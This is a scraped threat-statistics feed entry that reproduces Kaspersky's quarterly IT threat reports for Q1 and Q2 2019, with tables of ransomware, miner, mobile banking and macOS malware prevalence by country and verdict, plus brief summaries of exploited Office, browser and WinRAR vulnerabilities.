Seven new families were identified in the collection.\n\n_Number of new ransomware modifications, Q1 2018 \u2013 Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172044/ransomware-new-modification.png>)\n\n#### Number of users attacked by ransomware Trojans\n\nIn Q1 2019, Kaspersky Lab products defeated ransomware attacks against 284,489 unique KSN users.\n\nIn February, the number of attacked users decreased slightly compared with January; however, by March we recorded a rise in cybercriminal activity.\n\n_Number of unique users attacked by ransomware Trojans, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172107/en-ransomware-users.png>)\n\n### Attack geography\n\nGeography of mobile ransomware Trojans, Q1 2019[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171149/en-ransomware-map.png>)\n\n#### Top 10 countries attacked by ransomware Trojans\n\n| **Country*** | **% of users attacked by cryptors**** \n---|---|--- \n1 | Bangladesh | 8.11 \n2 | Uzbekistan | 6.36 \n3 | Ethiopia | 2.61 \n4 | Mozambique | 2.28 \n5 | Nepal | 2.09 \n6 | Vietnam | 1.37 \n7 | Pakistan | 1.14 \n8 | Afghanistan | 1.13 \n9 | India | 1.11 \n10 | Indonesia | 1.07 \n \n* Excluded are countries with relatively few Kaspersky Lab users (under 50,000). 
\n** Unique users whose computers were attacked by Trojan cryptors as a percentage of all unique users of Kaspersky Lab products in the country.\n\n#### Top 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts*** | **Percentage of attacked users**** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 26.25 \n2 | (generic verdict) | Trojan-Ransom.Win32.Phny | 18.98 \n3 | GandCrab | Trojan-Ransom.Win32.GandCrypt | 12.33 \n4 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 5.76 \n5 | Shade | Trojan-Ransom.Win32.Shade | 3.54 \n6 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 3.50 \n7 | PolyRansom/VirLock | Virus.Win32.PolyRansom | 2.82 \n8 | (generic verdict) | Trojan-Ransom.Win32.Gen | 2.02 \n9 | Crysis/Dharma | Trojan-Ransom.Win32.Crusis | 1.51 \n10 | (generic verdict) | Trojan-Ransom.Win32.Cryptor | 1.20 \n \n_* Statistics are based on detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data._ \n_** Unique Kaspersky Lab users attacked by a particular family of Trojan cryptors as a percentage of all users attacked by Trojan cryptors._\n\n## Miners\n\n### Statistics\n\n#### Number of new modifications\n\nIn Q1 2019, Kaspersky Lab solutions detected 11,971 new modifications of miners.\n\n_Number of new miner modifications, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172216/en-miners-modifications.png>)\n\n#### Number of users attacked by miners\n\nIn Q1, we detected attacks using miners on the computers of 1,197,066 unique users of Kaspersky Lab products worldwide.\n\n_Number of unique users attacked by miners, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172326/en-miners-users.png>)\n\n### Attack geography\n\n_Number of unique users attacked by miners, Q1 2019 _[ 
(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/23131558/en-miner-map.png>)\n\n#### Top 10 countries by share of users attacked by miners\n\n| **Country*** | **%**** \n---|---|--- \n1 | Afghanistan | 12.18 \n2 | Ethiopia | 10.02 \n3 | Uzbekistan | 7.97 \n4 | Kazakhstan | 5.84 \n5 | Tanzania | 4.73 \n6 | Ukraine | 4.28 \n7 | Mozambique | 4.17 \n8 | Belarus | 3.84 \n9 | Bolivia | 3.35 \n10 | Pakistan | 3.33 \n \n_* Excluded are countries with relatively few Kaspersky Lab users (under 50,000)._ \n_** Unique users whose computers were attacked by miners as a percentage of all unique users of Kaspersky Lab products in the country._\n\n## Vulnerable applications used by cybercriminals\n\nStatistics for Q1 2019 show that vulnerabilities in Microsoft Office are still being utilized more often than those in other applications, due to their easy exploitability and highly stable operation. The percentage of exploits for Microsoft Office did not change much compared to the previous quarter, amounting to 69%.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172438/exploits.png>)\n\nThis quarter's most popular vulnerabilities in the Microsoft Office suite were [CVE-2017-11882](<https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/17-year-old-ms-office-flaw-cve-2017-11882-actively-exploited-in-the-wild>) and [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>). They relate to the Equation Editor component, and cause buffer overflow with subsequent remote code execution. 
Lagging behind the chart leaders by a factor of almost two is [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>), a logical vulnerability and an analog of the no less popular [CVE-2017-0199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>). Next comes [CVE-2017-8759](<https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html>), where an error in the SOAP WSDL parser allowed malicious code to be injected and the computer to be infected. Microsoft Office vulnerabilities are overrepresented in the statistics partly due to the emergence of openly available generators of malicious documents that exploit these vulnerabilities.\n\nIn Q1, the share of detected vulnerabilities in browsers amounted to 14%, almost five times less than for Microsoft Office. Exploiting browser vulnerabilities is often difficult for attackers, since browser developers are forever coming up with new options to safeguard against certain types of vulnerabilities, while the techniques for bypassing them often require the use of entire vulnerability chains to achieve the objective, which significantly increases the cost of such attacks.\n\nHowever, this does not mean that sophisticated attacks on browsers do not exist. A prime example is the actively exploited zero-day vulnerability [CVE-2019-5786](<https://securityaffairs.co/wordpress/82058/hacking/chrome-zero-day-cve-2019-5786.html>) in Google Chrome. 
To bypass sandboxes, it was [used in conjunction](<https://www.zdnet.com/article/proof-of-concept-code-published-for-windows-7-zero-day/>) with an additional exploit for the vulnerability in the win32k.sys driver ([CVE-2019-0808](<https://securityaffairs.co/wordpress/82428/hacking/cve-2019-0808-win-flaw.html>)), with the targets being users of 32-bit versions of Windows 7.\n\nIt is fair to say that Q1 2019, like the quarter before it, was marked by a large number of zero-day targeted attacks. Kaspersky Lab researchers found an actively exploited zero-day vulnerability in the Windows kernel, which was assigned the ID [CVE-2019-0797](<https://securelist.com/cve-2019-0797-zero-day-vulnerability/89885/>). The vulnerability is a race condition caused by a lack of thread synchronization in undocumented system calls, resulting in a use-after-free. It is worth noting that [CVE-2019-0797](<https://securelist.com/cve-2019-0797-zero-day-vulnerability/89885/>) is the fourth zero-day vulnerability for Windows found by Kaspersky Lab in recent months.\n\nA remarkable event at the beginning of the year was the discovery by researchers of the [CVE-2018-20250](<https://www.tenable.com/blog/winrar-absolute-path-traversal-vulnerability-leads-to-remote-code-execution-cve-2018-20250-0>) vulnerability, which had existed for 19 years in the module for unpacking ACE archives in the WinRAR utility. This component lacks sufficient checks of the file path, and a specially created ACE archive allows cybercriminals to inject an executable file into the system autorun directory. The vulnerability was immediately used to start distributing malicious archives.\n\nDespite the fact that two years have passed since the vulnerabilities in the FuzzBunch exploit kit (EternalBlue, EternalRomance, etc.) were patched, these attacks still occupy all the top positions in our statistics. 
This is facilitated by the ongoing growth of malware that uses these exploits as a vector to distribute itself inside corporate networks.\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries that are sources of web-based attacks:\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky Lab products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn Q1 2019, Kaspersky Lab solutions blocked **843,096,461** attacks launched from online resources located in 203 countries across the globe. **113,640,221** unique URLs were recognized as malicious by Web Anti-Virus components.\n\n**_Distribution of web attack sources by country, Q1 2019_**[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172506/en-web-attack-source.png>)\n\nThis quarter, Web Anti-Virus was most active on resources located in the US.\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky Lab users on whose computers Web Anti-Virus was triggered during the quarter. 
The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include Web Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| **Country*** | **% of attacked users**** \n---|---|--- \n1 | Venezuela | 29.76 \n2 | Algeria | 25.10 \n3 | Greece | 24.16 \n4 | Albania | 23.57 \n5 | Estonia | 20.27 \n6 | Moldova | 20.09 \n7 | Ukraine | 19.97 \n8 | Serbia | 19.61 \n9 | Poland | 18.89 \n10 | Kyrgyzstan | 18.36 \n11 | Azerbaijan | 18.28 \n12 | Belarus | 18.22 \n13 | Tunisia | 18.09 \n14 | Latvia | 17.62 \n15 | Hungary | 17.61 \n16 | Bangladesh | 17.17 \n17 | Lithuania | 16.71 \n18 | Djibouti | 16.66 \n19 | Reunion | 16.65 \n20 | Tajikistan | 16.61 \n \n_* Excluded are countries with relatively few Kaspersky Lab users (under 10,000)._ \n_** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky Lab products in the country._\n\nThese statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky Lab products who consented to provide statistical data.\n\nOn average, 13.18% of Internet user computers worldwide experienced at least one **Malware-class** attack.\n\n**_Geography of malicious web attacks in Q1 2019 (percentage of attacked users)_**[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172633/en-web-attacks-map.png>)\n\n## Local threats\n\n_Statistics on local infections of user computers are an important indicator. 
They include objects that penetrated the target computer through infecting files or removable media, or initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\n_Data in this section is based on analyzing statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media. The data includes detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera/phone memory cards, and external hard drives._\n\nIn Q1 2019, our File Anti-Virus detected **247,907,593** malicious and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of users of Kaspersky Lab products on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nNote that as of this quarter, the rating includes only **Malware-class** attacks; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| **Country*** | **% of attacked users**** \n---|---|--- \n1 | Uzbekistan | 57.73 \n2 | Yemen | 57.66 \n3 | Tajikistan | 56.35 \n4 | Afghanistan | 56.13 \n5 | Turkmenistan | 55.42 \n6 | Kyrgyzstan | 51.52 \n7 | Ethiopia | 49.21 \n8 | Syria | 47.64 \n9 | Iraq | 46.16 \n10 | Bangladesh | 45.86 \n11 | Sudan | 45.72 \n12 | Algeria | 45.35 \n13 | Laos | 44.99 \n14 | Venezuela | 44.14 \n15 | Mongolia | 43.90 \n16 | Myanmar | 43.72 \n17 | Libya | 43.30 \n18 | Bolivia | 43.17 \n19 | Belarus | 43.04 \n20 | Azerbaijan | 42.93 \n \n_* Excluded are countries with relatively few Kaspersky Lab users (under 10,000)._ \n_** Unique users on whose computers **Malware-class** local threats were blocked, as a 
percentage of all unique users of Kaspersky Lab products in the country._\n\nThese statistics are based on detection verdicts returned by the OAS and ODS Anti-Virus modules received from users of Kaspersky Lab products who consented to provide statistical data. The data includes detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera/phone memory cards, or external hard drives.\n\nOn average, 23.62% of user computers globally faced at least one **Malware-class** local threat in Q1.", "cvss3": {}, "published": "2019-05-23T10:00:53", "type": "securelist", "title": "IT threat evolution Q1 2019. Statistics", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-0802", "CVE-2018-20250", "CVE-2019-0797", "CVE-2019-0808", "CVE-2019-5786"], "modified": "2019-05-23T10:00:53", "id": "SECURELIST:A3CEAF1114E104F14254F7AF77D7D080", "href": "https://securelist.com/it-threat-evolution-q1-2019-statistics/90916/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-19T18:27:50", "description": "\n\n_These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network,\n\n * Kaspersky solutions blocked 717,057,912 attacks launched from online resources in 203 countries across the globe.\n * 217,843,293 unique URLs triggered Web Anti-Virus components.\n * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 228,206 users.\n * Ransomware attacks were defeated on the computers of 232,292 unique users.\n * Our File Anti-Virus detected 240,754,063 unique malicious and potentially unwanted objects.\n * Kaspersky products for mobile devices detected: \n * 753,550 malicious installation packages\n * 13,899 
installation packages for mobile banking Trojans\n * 23,294 installation packages for mobile ransomware Trojans\n\n## Mobile threats\n\n### Quarterly highlights\n\nQ2 2019 will be remembered for several events.\n\nFirst, we uncovered a large-scale [financial threat by the name of Riltok](<https://securelist.com/mobile-banker-riltok/91374/>), which targeted clients of not only major Russian banks, but some foreign ones too.\n\nSecond, we detected the new Trojan.AndroidOS.MobOk malware, tasked with stealing money from mobile accounts through exploiting WAP-Click subscriptions. After infection, web activity on the victim device went into overdrive. In particular, the Trojan opened specially created pages, bypassed their CAPTCHA system using a third-party service, and then clicked on the necessary buttons to complete the subscription.\n\nThird, we repeated our [study](<https://securelist.com/beware-of-stalkerware/90264/>) of commercial spyware, a.k.a. stalkerware. And although such software is not malicious in the common sense of the word, it does entail certain risks for victims. So as of April 3, 2019, Kaspersky mobile products for Android notify users of all known commercial spyware.\n\nFourth, we managed to discover a new type of adware app (AdWare.AndroidOS.KeepMusic.a and AdWare.AndroidOS.KeepMusic.b verdicts) that bypasses operating system restrictions on apps running in the background. To stop its thread being terminated, one such adware app launches a music player and plays a silent file. The operating system thinks that the user is listening to music, and does not end the process, which is not displayed on the main screen of the device. At this moment, the device is operating as part of a botnet, supposedly showing ads to the victim. \"Supposedly\" because ads are also shown in background mode, when the victim might not be using the device.\n\nFifth, our attention was caught by the Hideapp family of Trojans. 
These Trojans spread very actively in Q2, including by means of a time-tested distribution mechanism: antivirus solution logos and porn apps.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153149/it-threat-evolution-q2-2019-statistics-1.png>)\n\nFinally, in some versions, the Trojan creators revealed a less-than-positive attitude to managers of one of Russia's largest IT companies:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153203/it-threat-evolution-q2-2019-statistics-2.png>)\n\n### Mobile threat statistics\n\nIn Q2 2019, Kaspersky detected 753,550 malicious installation packages, which is 151,624 fewer than in the previous quarter.\n\n_Number of detected malicious installation packages, Q3 2018 \u2013 Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153226/it-threat-evolution-q2-2019-statistics-3.png>)\n\nWhat's more, this is almost 1 million fewer than the number of malicious installation packages detected in Q2 2018. Over the course of this year, we have seen a steady decline in the amount of new mobile malware. The drop is the result of less cybercriminal activity in adding members to the most common families. \n\n### Distribution of detected mobile apps by type\n\n_Distribution of newly detected mobile apps by type, Q1 and Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153256/it-threat-evolution-q2-2019-statistics-4.png>)\n\nAmong all the threats detected in Q2 2019, the lion's share went to potentially unsolicited RiskTool apps with 41.24%, which is 11 p.p. more than in the previous quarter. 
The malicious objects most frequently encountered came from the RiskTool.AndroidOS.Agent family (33.07% of all detected threats in this class), RiskTool.AndroidOS.Smssend (15.68%), and RiskTool.AndroidOS.Wapron (14.41%).\n\nIn second place are adware apps, their share having increased by 2.16 p.p. to 18.71% of all detected threats. Most often, adware belonged to the AdWare.AndroidOS.Ewind family (26.46% of all threats in this class), AdWare.AndroidOS.Agent (23.60%), and AdWare.AndroidOS.MobiDash (17.39%).\n\nTrojan-class malware (11.83%) took third place, with its share for the quarter climbing by 2.31 p.p. The majority of detected files belonged to the Trojan.AndroidOS.Boogr family (32.42%) \u2013 this verdict was given to Trojans detected with machine-learning tools. Next come the Trojan.AndroidOS.Hiddapp (24.18%), Trojan.AndroidOS.Agent (14.58%), and Trojan.AndroidOS.Piom (9.73%) families. Note that Agent and Piom are aggregating verdicts that cover a range of Trojan specimens from various developers.\n\nThreats in the Trojan-Dropper class (10.04%) declined noticeably, shedding 15 p.p. Most of the files we detected belonged to the Trojan-Dropper.AndroidOS.Wapnor family (71% of all detected threats in this class), while no other family claimed more than 3%. A typical member of the Wapnor family consists of a random pornographic image, a polymorphic dropper, and a unique executable file. The task of the malware is to sign the victim up to a WAP subscription.\n\nIn Q2 2019, the share of detected mobile bankers slightly decreased: 1.84% versus 3.21% in Q1. The drop is largely due to a decrease in the generation of Trojans in the [Asacub](<https://securelist.com/the-rise-of-mobile-banker-asacub/87591/>) family. 
The most frequently created objects belonged to the [Trojan-Banker.AndroidOS.Svpeng](<https://securelist.com/the-android-trojan-svpeng-now-capable-of-mobile-phishing/57301/>) (30.79% of all detected mobile bankers), Trojan-Banker.AndroidOS.Wroba (17.16%), and Trojan-Banker.AndroidOS.Agent (15.70%) families.\n\n### Top 20 mobile malware programs\n\n_Note that this malware rating does not include potentially dangerous or unwanted programs related to RiskTool or adware._\n\n| Verdict | %* \n---|---|--- \n1 | DangerousObject.Multi.Generic | 44.37 \n2 | Trojan.AndroidOS.Boogr.gsh | 11.31 \n3 | DangerousObject.AndroidOS.GenericML | 5.66 \n4 | Trojan.AndroidOS.Hiddapp.cr | 4.77 \n5 | Trojan.AndroidOS.Hiddapp.ch | 4.17 \n6 | Trojan.AndroidOS.Hiddapp.cf | 2.81 \n7 | Trojan.AndroidOS.Hiddad.em | 2.53 \n8 | Trojan-Dropper.AndroidOS.Lezok.p | 2.16 \n9 | Trojan-Dropper.AndroidOS.Hqwar.bb | 2.08 \n10 | Trojan-Banker.AndroidOS.Asacub.a | 1.93 \n11 | Trojan-Banker.AndroidOS.Asacub.snt | 1.92 \n12 | Trojan-Banker.AndroidOS.Svpeng.ak | 1.91 \n13 | Trojan.AndroidOS.Hiddapp.cg | 1.89 \n14 | Trojan.AndroidOS.Dvmap.a | 1.88 \n15 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.86 \n16 | Trojan.AndroidOS.Agent.rt | 1.81 \n17 | Trojan-SMS.AndroidOS.Prizmes.a | 1.58 \n18 | Trojan.AndroidOS.Fakeapp.bt | 1.58 \n19 | Trojan.AndroidOS.Agent.eb | 1.49 \n20 | Exploit.AndroidOS.Lotoor.be | 1.46 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile solutions that were attacked._\n\nAs per tradition, first place in our Top 20 for Q2 went to the DangerousObject.Multi.Generic verdict (44.77%), which we use for malware detected using [cloud technologies](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). Cloud technologies are deployed when the antivirus databases lack data for detecting a piece of malware, but the company's cloud already contains information about the object. 
This is basically how the latest malicious programs are detected.\n\nSecond and third places were claimed by Trojan.AndroidOS.Boogr.gsh (11.31%) and DangerousObject.AndroidOS.GenericML (5.66%). These verdicts are assigned to files recognized as malicious by our [machine-learning systems](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>).\n\nFourth, fifth, sixth, seventh, and thirteenth places were taken by members of the Trojan.AndroidOS.Hiddapp family, whose task is to secretly download ads onto the infected device. If the user detects the adware app, the Trojan does not prevent its deletion, but re-installs the app at the first opportunity.\n\nEighth position belonged to Trojan-Dropper.AndroidOS.Lezok.p (2.16%). This Trojan displays persistent ads, steals money through SMS subscriptions, and inflates hit counters for apps on various platforms.\n\nNinth and fifteenth places were taken by members of the Hqwar dropper family (2.08% and 1.86%, respectively); this malware most often conceals banking Trojans.\n\nTenth and eleventh places went to members of the Asacub family of financial cyberthreats: Trojan-Banker.AndroidOS.Asacub.a (1.93%) and Trojan-Banker.AndroidOS.Asacub.snt (1.92%). 
Like the Hqwar droppers, this family lost a lot of ground in Q2 2019.\n\n### Geography of mobile threats\n\n_Geography of mobile malware infection attempts, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153325/it-threat-evolution-q2-2019-statistics-5.png>)\n\n#### Top 10 countries by share of users attacked by mobile malware\n\n| Country* | %** \n---|---|--- \n1 | Iran | 28.31 \n2 | Bangladesh | 28.10 \n3 | Algeria | 24.77 \n4 | Pakistan | 24.00 \n5 | Tanzania | 23.07 \n6 | Nigeria | 22.69 \n7 | India | 21.65 \n8 | Indonesia | 18.13 \n9 | Sri Lanka | 15.96 \n10 | Kenya | 15.38 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky mobile solutions (under 10,000)._ \n_** Unique users attacked by mobile bankers as a percentage of all users of Kaspersky mobile solutions in the country._\n\nAt the head of Q2's Top 10 countries by share of attacked users is Iran (28.31%), which took second place in this rating in Q1 2019. Iran displaced Pakistan (24%), which now occupies fourth position.\n\nMost often, users of Kaspersky security solutions in Iran encountered the Trojan.AndroidOS.Hiddapp.bn adware Trojan (21.08%) as well as the potentially unwanted apps RiskTool.AndroidOS.FakGram.a (12.50%), which seeks to intercept messages in Telegram, and RiskTool.AndroidOS.Dnotua.yfe (12.29%).\n\nLike Iran, Bangladesh (28.10%) rose one position in our Top 10. 
Most often, users in Bangladesh came across various adware aps, including AdWare.AndroidOS.Agent.f (35.68%), AdWare.AndroidOS.HiddenAd.et (14.88%), and AdWare.AndroidOS.Ewind.h (9.65%).\n\nThird place went to Algeria (24.77%), where users of Kaspersky mobile solutions most often ran into the AdWare.AndroidOS.HiddenAd.et (27.15%), AdWare.AndroidOS.Agent.f (14.16%), and AdWare.AndroidOS.Oimobi.a (8.04%) adware apps.\n\n### Mobile banking Trojans\n\nIn the reporting period, we detected **13,899** installation packages for mobile banking Trojans, down to nearly half the number recorded in Q1 2019.\n\nThe largest contribution was made by the creators of the Svpeng family of Trojans: 30.79% of all detected banking Trojans. Trojan-Banker.AndroidOS.Wroba (17.16%) and Trojan-Banker.AndroidOS.Agent (15.70%) came second and third, respectively. The much-hyped Asacub Trojan (11.98%) managed only fifth.\n\n_Number of installation packages for mobile banking Trojans detected by Kaspersky, Q3 2018 \u2013 Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153349/it-threat-evolution-q2-2019-statistics-6.png>)\n\n**Top 10 mobile banking Trojans**\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Banker.AndroidOS.Asacub.a | 13.64 \n2 | Trojan-Banker.AndroidOS.Asacub.snt | 13.61 \n3 | Trojan-Banker.AndroidOS.Svpeng.ak | 13.51 \n4 | Trojan-Banker.AndroidOS.Svpeng.q | 9.90 \n5 | Trojan-Banker.AndroidOS.Agent.ep | 9.37 \n6 | Trojan-Banker.AndroidOS.Asacub.ce | 7.75 \n7 | Trojan-Banker.AndroidOS.Faketoken.q | 4.18 \n8 | Trojan-Banker.AndroidOS.Asacub.cs | 4.18 \n9 | Trojan-Banker.AndroidOS.Agent.eq | 3.81 \n10 | Trojan-Banker.AndroidOS.Faketoken.z | 3.13 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile antivirus that were attacked by banking threats._\n\nAlmost half our Top 10 mobile bankers in Q2 2019 is made up of modifications of the Trojan-Banker.AndroidOS.Asacub Trojan: four positions out of ten. 
However, this family's distribution bursts that we registered last quarter were not repeated this time.\n\nAs in Q1, Trojan-Banker.AndroidOS.Agent.eq and Trojan-Banker.AndroidOS.Agent.ep made it into the Top 10; however, they ceded the highest positions to the Svpeng family of Trojans, which is considered one of the longest in existence.\n\n_Geography of mobile banking threats, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153417/it-threat-evolution-q2-2019-statistics-7.png>)\n\n#### Top 10 countries by share of users attacked by mobile banking Trojans:\n\n| Country* | %** \n---|---|--- \n1 | South Africa | 0.64% \n2 | Russia | 0.31% \n3 | Tajikistan | 0.21% \n4 | Australia | 0.17% \n5 | Turkey | 0.17% \n6 | Ukraine | 0.13% \n7 | Uzbekistan | 0.11% \n8 | Korea | 0.11% \n9 | Armenia | 0.10% \n10 | India | 0.10% \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky mobile solutions (under 10,000)._ \n_** Unique users attacked by mobile banking Trojans as a percentage of all users of Kaspersky mobile solutions in the country._\n\nIn Q2 2019, South Africa (0.64%) climbed to first place, up from fourth in the previous quarter. 
In 97% of cases, users in that country encountered Trojan-Banker.AndroidOS.Agent.dx.\n\nSecond place was claimed by Russia (0.31%), where our solutions most often detected members of the Asacub and Svpeng families: Trojan-Banker.AndroidOS.Asacub.a (14.03%), Trojan-Banker.AndroidOS.Asacub.snt (13.96%), and Trojan-Banker.AndroidOS.Svpeng.ak (13.95%).\n\nThird place belongs to Tajikistan (0.21%), where Trojan-Banker.AndroidOS.Faketoken.z (35.96%), Trojan-Banker.AndroidOS.Asacub.a (12.92%), and Trojan- Banker.AndroidOS.Grapereh.j (11.80%) were most frequently met.\n\n### Mobile ransomware Trojans\n\nIn Q2 2019, we detected **23,294** installation packages for mobile Trojan ransomware, which is 4,634 fewer than last quarter.\n\n_Number of installation packages for mobile banking Trojans, Q3 2018 \u2013 Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153440/it-threat-evolution-q2-2019-statistics-8.png>)\n\n#### Top 10 mobile ransomware Trojans\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Ransom.AndroidOS.Svpeng.aj | 43.90 \n2 | Trojan-Ransom.AndroidOS.Rkor.i | 11.26 \n3 | Trojan-Ransom.AndroidOS.Rkor.h | 7.81 \n4 | Trojan-Ransom.AndroidOS.Small.as | 6.41 \n5 | Trojan-Ransom.AndroidOS.Svpeng.ah | 5.92 \n6 | Trojan-Ransom.AndroidOS.Svpeng.ai | 3.35 \n7 | Trojan-Ransom.AndroidOS.Fusob.h | 2.48 \n8 | Trojan-Ransom.AndroidOS.Small.o | 2.46 \n9 | Trojan-Ransom.AndroidOS.Pigetrl.a | 2.45 \n10 | Trojan-Ransom.AndroidOS.Small.ce | 2.22 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile solutions that were attacked by ransomware Trojans._\n\nIn Q2 2019, the most widespread family of ransomware Trojans was Svpeng: three positions in the Top 10.\n\n_Geography of mobile ransomware Trojans, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153507/it-threat-evolution-q2-2019-statistics-9.png>)\n\n#### Top 10 countries by share of users attacked 
by mobile ransomware Trojans:\n\n| Country* | %** \n---|---|--- \n1 | US | 1.58 \n2 | Kazakhstan | 0.39 \n3 | Iran | 0.27 \n4 | Pakistan | 0.16 \n5 | Saudi Arabia | 0.10 \n6 | Mexico | 0.09 \n7 | Canada | 0.07 \n8 | Italy | 0.07 \n9 | Singapore | 0.05 \n10 | Indonesia | 0.05 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky mobile solutions (under 10,000)_ \n_** Unique users attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky mobile solutions in the country._\n\nThe leaders by number of users attacked by mobile ransomware Trojans, as in the previous quarter, were the US (1.58%), Kazakhstan (0.39%), and Iran (0.27%)\n\n## Attacks on Apple macOS\n\nQ2 witnessed several interesting events, three of which deserve special attention.\n\nA [vulnerability](<https://www.fcvl.net/vulnerabilities/macosx-gatekeeper-bypass>) was discovered in the macOS operating system allowing Gatekeeper and XProtect scans to be bypassed. Exploitation requires creating an archive with a symbolic link to the shared NFS folder containing the file. When the archive is opened, the file from the shared NFS folder is automatically downloaded by the system without any checks. The first malware exploiting this vulnerability was not long in coming; however, all the detected specimens were more likely test versions than actual malware.\n\nVulnerabilities detected in the Firefox browser ([CVE-2019-11707](<https://www.mozilla.org/en-US/security/advisories/mfsa2019-18/>), [CVE-2019-11708](<https://www.mozilla.org/en-US/security/advisories/mfsa2019-19/>)) allowed arbitrary code to be executed with a view to sandbox escape. After this information was made public, the first exploitations occurred. 
Using these vulnerabilities, cybercriminals dropped spyware Trojans from the Mokes and Wirenet families onto victim computers.\n\nAlso an interesting vector for delivering a malicious miner to victims was [discovered](<https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/>). The attackers used social engineering and legitimate apps modified with malicious code. But even more interestingly, the malicious part consisted of a QEMU emulator and a Linux virtual machine, housing the miner. As soon as QEMU was launched on the infected machine, the miner started up inside its image. The scheme is so outlandish \u2013 both QEMU and the miner consume significant resources \u2013 that such a Trojan could not remain unnoticed for long.\n\n### Top 20 threats for macOS\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Downloader.OSX.Shlayer.a | 24.61 \n2 | AdWare.OSX.Spc.a | 12.75 \n3 | AdWare.OSX.Bnodlero.t | 11.98 \n4 | AdWare.OSX.Pirrit.j | 11.27 \n5 | AdWare.OSX.Pirrit.p | 8.42 \n6 | AdWare.OSX.Pirrit.s | 7.76 \n7 | AdWare.OSX.Pirrit.o | 7.59 \n8 | AdWare.OSX.MacSearch.a | 5.92 \n9 | 